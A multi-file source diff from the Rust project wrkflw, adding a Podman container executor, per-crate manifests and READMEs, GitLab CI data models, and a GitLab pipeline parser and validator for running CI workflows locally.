|
||||
if !cleanup_output.status.success() {
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Failed to remove successful container {}",
|
||||
container_name
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => wrkflw_logging::debug(&format!(
|
||||
"Timeout removing successful container {}",
|
||||
container_name
|
||||
)),
|
||||
}
|
||||
}
|
||||
// If not preserving, container was auto-removed with --rm
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Failed container
|
||||
if self.preserve_containers_on_failure {
|
||||
// Failed and we want to preserve - don't clean up but untrack from auto-cleanup
|
||||
wrkflw_logging::info(&format!(
|
||||
"Preserving failed container {} for debugging (exit code: {}). Use 'podman exec -it {} bash' to inspect.",
|
||||
container_name, output.exit_code, container_name
|
||||
));
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Failed but we don't want to preserve - container was auto-removed with --rm
|
||||
untrack_container(&container_name);
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(_) => {
|
||||
// Command failed to execute properly - clean up if container exists and not preserving
|
||||
if !self.preserve_containers_on_failure {
|
||||
// Container was created with --rm, so it should be auto-removed
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Container was created without --rm, try to clean it up since execution failed
|
||||
let cleanup_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["rm", "-f", &container_name])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match cleanup_result {
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!(
|
||||
"Cleaned up failed execution container {}",
|
||||
container_name
|
||||
)),
|
||||
_ => wrkflw_logging::debug(&format!(
|
||||
"Failed to clean up execution failure container {}",
|
||||
container_name
|
||||
)),
|
||||
}
|
||||
untrack_container(&container_name);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
match &result {
|
||||
Ok(output) => {
|
||||
if output.exit_code != 0 {
|
||||
wrkflw_logging::info(&format!(
|
||||
"Podman command failed with exit code: {}",
|
||||
output.exit_code
|
||||
));
|
||||
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::debug(&format!("STDERR: {}", output.stderr));
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Podman execution error: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
async fn pull_image_inner(&self, image: &str) -> Result<(), ContainerError> {
|
||||
let args = vec!["pull", image];
|
||||
let output = self.execute_podman_command(&args, None).await?;
|
||||
|
||||
if output.exit_code != 0 {
|
||||
return Err(ContainerError::ImagePull(format!(
|
||||
"Failed to pull image {}: {}",
|
||||
image, output.stderr
|
||||
)));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image_inner(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
let context_dir = dockerfile.parent().unwrap_or(Path::new("."));
|
||||
let dockerfile_str = dockerfile.to_string_lossy().to_string();
|
||||
let context_dir_str = context_dir.to_string_lossy().to_string();
|
||||
let args = vec!["build", "-f", &dockerfile_str, "-t", tag, &context_dir_str];
|
||||
|
||||
let output = self.execute_podman_command(&args, None).await?;
|
||||
|
||||
if output.exit_code != 0 {
|
||||
return Err(ContainerError::ImageBuild(format!(
|
||||
"Failed to build image {}: {}",
|
||||
tag, output.stderr
|
||||
)));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
|
||||
// Public accessor functions for testing
|
||||
#[cfg(test)]
|
||||
pub fn get_tracked_containers() -> Vec<String> {
|
||||
if let Ok(containers) = RUNNING_CONTAINERS.lock() {
|
||||
containers.clone()
|
||||
} else {
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
24
crates/github/Cargo.toml
Normal file
24
crates/github/Cargo.toml
Normal file
@@ -0,0 +1,24 @@
|
||||
[package]
|
||||
name = "wrkflw-github"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "GitHub API integration for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies from workspace
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
reqwest.workspace = true
|
||||
thiserror.workspace = true
|
||||
lazy_static.workspace = true
|
||||
regex.workspace = true
|
||||
23
crates/github/README.md
Normal file
23
crates/github/README.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## wrkflw-github
|
||||
|
||||
GitHub integration helpers used by `wrkflw` to list/trigger workflows.
|
||||
|
||||
- **List workflows** in `.github/workflows`
|
||||
- **Trigger workflow_dispatch** events over the GitHub API
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_github::{get_repo_info, trigger_workflow};
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let info = get_repo_info()?;
|
||||
println!("{}/{} (default branch: {})", info.owner, info.repo, info.default_branch);
|
||||
|
||||
// Requires GITHUB_TOKEN in env
|
||||
trigger_workflow("ci", Some("main"), None).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
Notes: set `GITHUB_TOKEN` with the `workflow` scope; only public repos are supported out-of-the-box.
|
||||
@@ -1,6 +1,9 @@
|
||||
// github crate
|
||||
|
||||
use lazy_static::lazy_static;
|
||||
use regex::Regex;
|
||||
use reqwest::header;
|
||||
use serde_json::{self};
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
25
crates/gitlab/Cargo.toml
Normal file
25
crates/gitlab/Cargo.toml
Normal file
@@ -0,0 +1,25 @@
|
||||
[package]
|
||||
name = "wrkflw-gitlab"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "GitLab API integration for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
lazy_static.workspace = true
|
||||
regex.workspace = true
|
||||
reqwest.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
thiserror.workspace = true
|
||||
urlencoding.workspace = true
|
||||
23
crates/gitlab/README.md
Normal file
23
crates/gitlab/README.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## wrkflw-gitlab
|
||||
|
||||
GitLab integration helpers used by `wrkflw` to trigger pipelines.
|
||||
|
||||
- Reads repo info from local git remote
|
||||
- Triggers pipelines via GitLab API
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_gitlab::{get_repo_info, trigger_pipeline};
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let info = get_repo_info()?;
|
||||
println!("{}/{} (default branch: {})", info.namespace, info.project, info.default_branch);
|
||||
|
||||
// Requires GITLAB_TOKEN in env (api scope)
|
||||
trigger_pipeline(Some("main"), None).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
Notes: looks for `.gitlab-ci.yml` in the repo root when listing pipelines.
|
||||
@@ -1,3 +1,5 @@
|
||||
// gitlab crate
|
||||
|
||||
use lazy_static::lazy_static;
|
||||
use regex::Regex;
|
||||
use reqwest::header;
|
||||
21
crates/logging/Cargo.toml
Normal file
21
crates/logging/Cargo.toml
Normal file
@@ -0,0 +1,21 @@
|
||||
[package]
|
||||
name = "wrkflw-logging"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Logging functionality for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
chrono.workspace = true
|
||||
once_cell.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
22
crates/logging/README.md
Normal file
22
crates/logging/README.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## wrkflw-logging
|
||||
|
||||
Lightweight in-memory logging with simple levels for TUI/CLI output.
|
||||
|
||||
- Thread-safe, timestamped messages
|
||||
- Level filtering (Debug/Info/Warning/Error)
|
||||
- Pluggable into UI for live log views
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_logging::{info, warning, error, LogLevel, set_log_level, get_logs};
|
||||
|
||||
set_log_level(LogLevel::Info);
|
||||
info("starting");
|
||||
warning("be careful");
|
||||
error("boom");
|
||||
|
||||
for line in get_logs() {
|
||||
println!("{}", line);
|
||||
}
|
||||
```
|
||||
21
crates/matrix/Cargo.toml
Normal file
21
crates/matrix/Cargo.toml
Normal file
@@ -0,0 +1,21 @@
|
||||
[package]
|
||||
name = "wrkflw-matrix"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Matrix job parallelization for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
indexmap.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
thiserror.workspace = true
|
||||
20
crates/matrix/README.md
Normal file
20
crates/matrix/README.md
Normal file
@@ -0,0 +1,20 @@
|
||||
## wrkflw-matrix
|
||||
|
||||
Matrix expansion utilities used to compute all job combinations and format labels.
|
||||
|
||||
- Supports `include`, `exclude`, `max-parallel`, and `fail-fast`
|
||||
- Provides display helpers for UI/CLI
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_matrix::{MatrixConfig, expand_matrix};
|
||||
use serde_yaml::Value;
|
||||
use std::collections::HashMap;
|
||||
|
||||
let mut cfg = MatrixConfig::default();
|
||||
cfg.parameters.insert("os".into(), Value::from(vec!["ubuntu", "alpine"])) ;
|
||||
|
||||
let combos = expand_matrix(&cfg).expect("expand");
|
||||
assert!(!combos.is_empty());
|
||||
```
|
||||
@@ -1,3 +1,5 @@
|
||||
// matrix crate
|
||||
|
||||
use indexmap::IndexMap;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_yaml::Value;
|
||||
17
crates/models/Cargo.toml
Normal file
17
crates/models/Cargo.toml
Normal file
@@ -0,0 +1,17 @@
|
||||
[package]
|
||||
name = "wrkflw-models"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Data models and structures for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
thiserror.workspace = true
|
||||
16
crates/models/README.md
Normal file
16
crates/models/README.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## wrkflw-models
|
||||
|
||||
Common data structures shared across crates.
|
||||
|
||||
- `ValidationResult` for structural/semantic checks
|
||||
- GitLab pipeline models (serde types)
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
let mut res = ValidationResult::new();
|
||||
res.add_issue("missing jobs".into());
|
||||
assert!(!res.is_valid);
|
||||
```
|
||||
338
crates/models/src/lib.rs
Normal file
338
crates/models/src/lib.rs
Normal file
@@ -0,0 +1,338 @@
|
||||
pub struct ValidationResult {
|
||||
pub is_valid: bool,
|
||||
pub issues: Vec<String>,
|
||||
}
|
||||
|
||||
impl Default for ValidationResult {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl ValidationResult {
|
||||
pub fn new() -> Self {
|
||||
ValidationResult {
|
||||
is_valid: true,
|
||||
issues: Vec::new(),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn add_issue(&mut self, issue: String) {
|
||||
self.is_valid = false;
|
||||
self.issues.push(issue);
|
||||
}
|
||||
}
|
||||
|
||||
// GitLab pipeline models
|
||||
pub mod gitlab {
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::HashMap;
|
||||
|
||||
/// Represents a GitLab CI/CD pipeline configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Pipeline {
|
||||
/// Default image for all jobs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub image: Option<Image>,
|
||||
|
||||
/// Global variables available to all jobs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub variables: Option<HashMap<String, String>>,
|
||||
|
||||
/// Pipeline stages in execution order
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub stages: Option<Vec<String>>,
|
||||
|
||||
/// Default before_script for all jobs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub before_script: Option<Vec<String>>,
|
||||
|
||||
/// Default after_script for all jobs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub after_script: Option<Vec<String>>,
|
||||
|
||||
/// Job definitions (name => job)
|
||||
#[serde(flatten)]
|
||||
pub jobs: HashMap<String, Job>,
|
||||
|
||||
/// Workflow rules for the pipeline
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub workflow: Option<Workflow>,
|
||||
|
||||
/// Includes for pipeline configuration
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub include: Option<Vec<Include>>,
|
||||
}
|
||||
|
||||
/// A job in a GitLab CI/CD pipeline
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Job {
|
||||
/// The stage this job belongs to
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub stage: Option<String>,
|
||||
|
||||
/// Docker image to use for this job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub image: Option<Image>,
|
||||
|
||||
/// Script commands to run
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub script: Option<Vec<String>>,
|
||||
|
||||
/// Commands to run before the main script
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub before_script: Option<Vec<String>>,
|
||||
|
||||
/// Commands to run after the main script
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub after_script: Option<Vec<String>>,
|
||||
|
||||
/// When to run the job (on_success, on_failure, always, manual)
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub when: Option<String>,
|
||||
|
||||
/// Allow job failure
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub allow_failure: Option<bool>,
|
||||
|
||||
/// Services to run alongside the job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub services: Option<Vec<Service>>,
|
||||
|
||||
/// Tags to define which runners can execute this job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub tags: Option<Vec<String>>,
|
||||
|
||||
/// Job-specific variables
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub variables: Option<HashMap<String, String>>,
|
||||
|
||||
/// Job dependencies
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub dependencies: Option<Vec<String>>,
|
||||
|
||||
/// Artifacts to store after job execution
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub artifacts: Option<Artifacts>,
|
||||
|
||||
/// Cache configuration
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub cache: Option<Cache>,
|
||||
|
||||
/// Rules for when this job should run
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub rules: Option<Vec<Rule>>,
|
||||
|
||||
/// Only run on specified refs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub only: Option<Only>,
|
||||
|
||||
/// Exclude specified refs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub except: Option<Except>,
|
||||
|
||||
/// Retry configuration
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub retry: Option<Retry>,
|
||||
|
||||
/// Timeout for the job in seconds
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub timeout: Option<String>,
|
||||
|
||||
/// Mark job as parallel and specify instance count
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub parallel: Option<usize>,
|
||||
|
||||
/// Flag to indicate this is a template job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub template: Option<bool>,
|
||||
|
||||
/// List of jobs this job extends from
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub extends: Option<Vec<String>>,
|
||||
}
|
||||
|
||||
/// Docker image configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Image {
|
||||
/// Simple image name as string
|
||||
Simple(String),
|
||||
/// Detailed image configuration
|
||||
Detailed {
|
||||
/// Image name
|
||||
name: String,
|
||||
/// Entrypoint to override in the image
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
entrypoint: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Service container to run alongside a job
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Service {
|
||||
/// Simple service name as string
|
||||
Simple(String),
|
||||
/// Detailed service configuration
|
||||
Detailed {
|
||||
/// Service name/image
|
||||
name: String,
|
||||
/// Command to run in the service container
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
command: Option<Vec<String>>,
|
||||
/// Entrypoint to override in the image
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
entrypoint: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Artifacts configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Artifacts {
|
||||
/// Paths to include as artifacts
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub paths: Option<Vec<String>>,
|
||||
/// Artifact expiration duration
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub expire_in: Option<String>,
|
||||
/// When to upload artifacts (on_success, on_failure, always)
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub when: Option<String>,
|
||||
}
|
||||
|
||||
/// Cache configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Cache {
|
||||
/// Cache key
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub key: Option<String>,
|
||||
/// Paths to cache
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub paths: Option<Vec<String>>,
|
||||
/// When to save cache (on_success, on_failure, always)
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub when: Option<String>,
|
||||
/// Cache policy
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub policy: Option<String>,
|
||||
}
|
||||
|
||||
/// Rule for conditional job execution
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Rule {
|
||||
/// If condition expression
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub if_: Option<String>,
|
||||
/// When to run if condition is true
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub when: Option<String>,
|
||||
/// Variables to set if condition is true
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub variables: Option<HashMap<String, String>>,
|
||||
}
|
||||
|
||||
/// Only/except configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Only {
|
||||
/// Simple list of refs
|
||||
Refs(Vec<String>),
|
||||
/// Detailed configuration
|
||||
Complex {
|
||||
/// Refs to include
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
refs: Option<Vec<String>>,
|
||||
/// Branch patterns to include
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
branches: Option<Vec<String>>,
|
||||
/// Tags to include
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
tags: Option<Vec<String>>,
|
||||
/// Pipeline types to include
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
variables: Option<Vec<String>>,
|
||||
/// Changes to files that trigger the job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
changes: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Except configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Except {
|
||||
/// Simple list of refs
|
||||
Refs(Vec<String>),
|
||||
/// Detailed configuration
|
||||
Complex {
|
||||
/// Refs to exclude
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
refs: Option<Vec<String>>,
|
||||
/// Branch patterns to exclude
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
branches: Option<Vec<String>>,
|
||||
/// Tags to exclude
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
tags: Option<Vec<String>>,
|
||||
/// Variable expressions to exclude
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
variables: Option<Vec<String>>,
|
||||
/// Changes to files that don't trigger the job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
changes: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Workflow configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Workflow {
|
||||
/// Rules for when to run the pipeline
|
||||
pub rules: Vec<Rule>,
|
||||
}
|
||||
|
||||
/// Retry configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Retry {
|
||||
/// Simple max attempts
|
||||
MaxAttempts(u32),
|
||||
/// Detailed retry configuration
|
||||
Detailed {
|
||||
/// Maximum retry attempts
|
||||
max: u32,
|
||||
/// When to retry
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
when: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Include configuration for external pipeline files
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Include {
|
||||
/// Simple string include
|
||||
Local(String),
|
||||
/// Detailed include configuration
|
||||
Detailed {
|
||||
/// Local file path
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
local: Option<String>,
|
||||
/// Remote file URL
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
remote: Option<String>,
|
||||
/// Include from project
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
project: Option<String>,
|
||||
/// Include specific file from project
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
file: Option<String>,
|
||||
/// Include template
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
template: Option<String>,
|
||||
/// Ref to use when including from project
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
ref_: Option<String>,
|
||||
},
|
||||
}
|
||||
}
|
||||
crates/parser/Cargo.toml (new file, 26 lines)
@@ -0,0 +1,26 @@
[package]
name = "wrkflw-parser"
version.workspace = true
edition.workspace = true
description = "Workflow parsing functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# Internal crates
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }

# External dependencies
jsonschema.workspace = true
serde.workspace = true
serde_yaml.workspace = true
serde_json.workspace = true
thiserror.workspace = true

[dev-dependencies]
tempfile = "3.7"
crates/parser/README.md (new file, 13 lines)
@@ -0,0 +1,13 @@
## wrkflw-parser

Parsers and schema helpers for GitHub/GitLab workflow files.

- GitHub Actions workflow parsing and JSON Schema validation
- GitLab CI parsing helpers

### Example

```rust
// High-level crates (`wrkflw` and `wrkflw-executor`) wrap parser usage.
// Use those unless you are extending parsing behavior directly.
```
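For a rough idea of direct use, here is a minimal sketch that assumes the GitLab helpers in `src/gitlab.rs` are exposed as `wrkflw_parser::gitlab`; the `.gitlab-ci.yml` path is only an example:

```rust
use std::path::Path;
use wrkflw_parser::gitlab::{parse_pipeline, validate_pipeline_structure};

fn main() {
    // Parse a GitLab CI file; parsing also runs JSON Schema validation internally.
    match parse_pipeline(Path::new(".gitlab-ci.yml")) {
        Ok(pipeline) => {
            println!("parsed {} job(s)", pipeline.jobs.len());
            // Structural checks: missing scripts, undefined stages, dependencies, extends.
            let _issues = validate_pipeline_structure(&pipeline);
        }
        Err(err) => eprintln!("failed to parse pipeline: {}", err),
    }
}
```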
crates/parser/src/github-workflow.json (new file, 1711 lines): diff suppressed because it is too large
crates/parser/src/gitlab-ci.json (new file, 3012 lines): diff suppressed because it is too large
crates/parser/src/gitlab.rs (new file, 278 lines)
@@ -0,0 +1,278 @@
|
||||
use crate::schema::{SchemaType, SchemaValidator};
|
||||
use crate::workflow;
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
use thiserror::Error;
|
||||
use wrkflw_models::gitlab::Pipeline;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
#[derive(Error, Debug)]
|
||||
pub enum GitlabParserError {
|
||||
#[error("I/O error: {0}")]
|
||||
IoError(#[from] std::io::Error),
|
||||
|
||||
#[error("YAML parsing error: {0}")]
|
||||
YamlError(#[from] serde_yaml::Error),
|
||||
|
||||
#[error("Invalid pipeline structure: {0}")]
|
||||
InvalidStructure(String),
|
||||
|
||||
#[error("Schema validation error: {0}")]
|
||||
SchemaValidationError(String),
|
||||
}
|
||||
|
||||
/// Parse a GitLab CI/CD pipeline file
|
||||
pub fn parse_pipeline(pipeline_path: &Path) -> Result<Pipeline, GitlabParserError> {
|
||||
// Read the pipeline file
|
||||
let pipeline_content = fs::read_to_string(pipeline_path)?;
|
||||
|
||||
// Validate against schema
|
||||
let validator = SchemaValidator::new().map_err(GitlabParserError::SchemaValidationError)?;
|
||||
|
||||
validator
|
||||
.validate_with_specific_schema(&pipeline_content, SchemaType::GitLab)
|
||||
.map_err(GitlabParserError::SchemaValidationError)?;
|
||||
|
||||
// Parse the pipeline YAML
|
||||
let pipeline: Pipeline = serde_yaml::from_str(&pipeline_content)?;
|
||||
|
||||
// Return the parsed pipeline
|
||||
Ok(pipeline)
|
||||
}
|
||||
|
||||
/// Validate the basic structure of a GitLab CI/CD pipeline
|
||||
pub fn validate_pipeline_structure(pipeline: &Pipeline) -> ValidationResult {
|
||||
let mut result = ValidationResult::new();
|
||||
|
||||
// Check for at least one job
|
||||
if pipeline.jobs.is_empty() {
|
||||
result.add_issue("Pipeline must contain at least one job".to_string());
|
||||
}
|
||||
|
||||
// Check for script in jobs
|
||||
for (job_name, job) in &pipeline.jobs {
|
||||
// Skip template jobs
|
||||
if let Some(true) = job.template {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check for script or extends
|
||||
if job.script.is_none() && job.extends.is_none() {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' must have a script section or extend another job",
|
||||
job_name
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
// Check that referenced stages are defined
|
||||
if let Some(stages) = &pipeline.stages {
|
||||
for (job_name, job) in &pipeline.jobs {
|
||||
if let Some(stage) = &job.stage {
|
||||
if !stages.contains(stage) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' references undefined stage '{}'",
|
||||
job_name, stage
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check that job dependencies exist
|
||||
for (job_name, job) in &pipeline.jobs {
|
||||
if let Some(dependencies) = &job.dependencies {
|
||||
for dependency in dependencies {
|
||||
if !pipeline.jobs.contains_key(dependency) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' depends on undefined job '{}'",
|
||||
job_name, dependency
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check that job extensions exist
|
||||
for (job_name, job) in &pipeline.jobs {
|
||||
if let Some(extends) = &job.extends {
|
||||
for extend in extends {
|
||||
if !pipeline.jobs.contains_key(extend) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' extends undefined job '{}'",
|
||||
job_name, extend
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
/// Convert a GitLab CI/CD pipeline to a format compatible with the workflow executor
|
||||
pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefinition {
|
||||
// Create a new workflow with required fields
|
||||
let mut workflow = workflow::WorkflowDefinition {
|
||||
name: "Converted GitLab CI Pipeline".to_string(),
|
||||
on: vec!["push".to_string()], // Default trigger
|
||||
on_raw: serde_yaml::Value::String("push".to_string()),
|
||||
jobs: HashMap::new(),
|
||||
};
|
||||
